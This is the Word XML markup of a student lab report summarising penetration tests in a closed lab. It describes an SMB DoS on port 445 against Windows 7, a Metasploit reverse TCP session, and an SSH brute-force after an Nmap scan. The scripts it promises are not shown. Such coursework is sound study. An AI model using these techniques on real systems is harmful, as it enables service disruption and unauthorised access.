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CB7D7" w14:textId="2C64A8BE" w:rsidR="5433AB64" w:rsidRDefault="47D3212D" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidR="7B4CFCC4" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scritps for</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Penetration Testing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166793C8" w14:textId="538FBD4F" w:rsidR="5433AB64" w:rsidRDefault="47D3212D" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762245A4" w14:textId="3980C9D7" w:rsidR="5433AB64" w:rsidRDefault="637DDA81" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Team: Darknet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B192501" w14:textId="5710E42E" w:rsidR="5433AB64" w:rsidRDefault="5433AB64" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14D08E31" w14:textId="7322F75E" w:rsidR="5433AB64" w:rsidRDefault="1C405B71" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Date: 12/14/2022</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A398ABB" w14:textId="7E3C5D7D" w:rsidR="5433AB64" w:rsidRPr="00452F7C" w:rsidRDefault="1C405B71" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467B28C3" w14:textId="79205D21" w:rsidR="5433AB64" w:rsidRDefault="7B564888" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>*Python Scripts are put on the bottom of this document.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5FBC85" w14:textId="17948E45" w:rsidR="5433AB64" w:rsidRDefault="5433AB64" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="540C9381" w14:textId="1A222BCE" w:rsidR="5433AB64" w:rsidRDefault="5433AB64" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FC50626" w14:textId="40111FC9" w:rsidR="5433AB64" w:rsidRDefault="1C405B71" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Lab Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199F6FF3" w14:textId="47F56CB0" w:rsidR="5433AB64" w:rsidRDefault="5433AB64" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="769DB234" w14:textId="29902F80" w:rsidR="5433AB64" w:rsidRDefault="33815CAB" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>For this lab, we are performing scanning and penetration testing from two hosts (Windows 10 and Kali Linux) to two targets (Windows 7 and Linux Metasploitable). We will be creating python scripts to scan and perform attack vulnerabilities that we have found from the previous lab. The tools that we are leveraging include Kali Metasploitable and DoS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7D16A1" w14:textId="60C8B275" w:rsidR="5433AB64" w:rsidRDefault="147F508D" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DF5A87" w14:textId="366A37A4" w:rsidR="5433AB64" w:rsidRDefault="1C405B71" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Lab Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F65F98" w14:textId="3F712DFB" w:rsidR="5433AB64" w:rsidRDefault="5433AB64" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1582DFD2" w14:textId="5204F262" w:rsidR="5433AB64" w:rsidRDefault="39E7F30F" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">On Windows 7, we have been able to send DDoS to the target using SMB data strings, by exploiting the target with a Dos attack via port 445 from Windows 10. From Kali Linux, we could also find vulnerabilities that we could exploit, so we performed a Reverse TCP attack by using Metasploitable, after which a session was created. On the other hand, to attack Metasploitable from Kali Linux, we used Nmap to scan and SSH to perform a brute-force attack to find the correct credentials for the Metasploitable account. All the attacks were successful by finding first the vulnerabilities, then exploiting them with tools that could be used for these two target machines.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEEBD76" w14:textId="2026C317" w:rsidR="5433AB64" w:rsidRDefault="5433AB64" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BCED492" w14:textId="19558F86" w:rsidR="5433AB64" w:rsidRDefault="1C405B71" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Problem Description</w:t>
      </w:r>
      <w:r w:rsidR="290661FA" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33113254" w14:textId="5E436C5E" w:rsidR="5433AB64" w:rsidRDefault="5433AB64" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="785A9007" w14:textId="43A33C6B" w:rsidR="5433AB64" w:rsidRDefault="58D63082" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Our main issue </w:t>
      </w:r>
      <w:r w:rsidR="67C727AB" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="3B54D1C0" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">to choose </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">the most efficient and appropriate tools to perform the </w:t>
      </w:r>
      <w:r w:rsidR="7804DFAD" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">different </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>attack</w:t>
      </w:r>
      <w:r w:rsidR="177B15B4" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>s from Windows 10 and Kali Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="65544B30" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">For us to overcome that issue, we had decided to </w:t>
      </w:r>
      <w:r w:rsidR="43E662E3" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">use </w:t>
      </w:r>
      <w:r w:rsidR="4E6C22B8" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">path-specific </w:t>
      </w:r>
      <w:r w:rsidR="17DBA544" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">scanning </w:t>
      </w:r>
      <w:r w:rsidR="3656FD42" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>methods</w:t>
      </w:r>
      <w:r w:rsidR="17DBA544" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6082C005" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="17DBA544" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python scripts to launch the attacks. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378BC97B" w14:textId="62DC14A8" w:rsidR="5433AB64" w:rsidRDefault="5433AB64" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40FDB540" w14:textId="79BDEE3F" w:rsidR="5433AB64" w:rsidRDefault="1C405B71" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Accomplishments </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012D0CAC" w14:textId="3BF21A42" w:rsidR="5433AB64" w:rsidRDefault="5433AB64" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FCD7CDB" w14:textId="6C8EB953" w:rsidR="5433AB64" w:rsidRDefault="2D489C49" w:rsidP="775BB15B">
      <w:pPr>
        <w:spacing w:line="257" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">During this Lab, we have been able to </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">create scripts that </w:t>
      </w:r>
      <w:r w:rsidR="634DB73D" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>perform vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> scanning on the </w:t>
      </w:r>
      <w:r w:rsidR="15A9A1C9" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">target </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">hosts in our environment as well as </w:t>
      </w:r>
      <w:r w:rsidR="08791B5A" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">exploitation </w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">scripts for </w:t>
      </w:r>
      <w:r w:rsidR="249A98F2" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>these</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerabilities. This will help our process of scanning and </w:t>
      </w:r>
      <w:r w:rsidR="6EF15F48" w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>exploiting the target machines’</w:t>
      </w:r>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9B9B2B" w14:textId="473F1E94" w:rsidR="5433AB64" w:rsidRDefault="5433AB64" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="753B4F74" w14:textId="589D7D29" w:rsidR="5433AB64" w:rsidRDefault="5433AB64" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D43439B" w14:textId="3ACFA13F" w:rsidR="5433AB64" w:rsidRDefault="5433AB64" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B070732" w14:textId="6149F429" w:rsidR="5433AB64" w:rsidRDefault="5433AB64" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E65C6B6" w14:textId="65531D96" w:rsidR="5433AB64" w:rsidRDefault="5433AB64" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BF75CE0" w14:textId="0020A6CF" w:rsidR="775BB15B" w:rsidRDefault="775BB15B" w:rsidP="775BB15B">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38D3DDBA" w14:textId="3E30A3D4" w:rsidR="00A53807" w:rsidRDefault="00A53807" w:rsidP="5433AB64">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB32E8D" w14:textId="77777777" w:rsidR="00A53807" w:rsidRDefault="00A53807">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="775BB15B">
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C33EF32" w14:textId="18B3AE4B" w:rsidR="3002FF75" w:rsidRDefault="3002FF75" w:rsidP="775BB15B">
      <w:pPr>
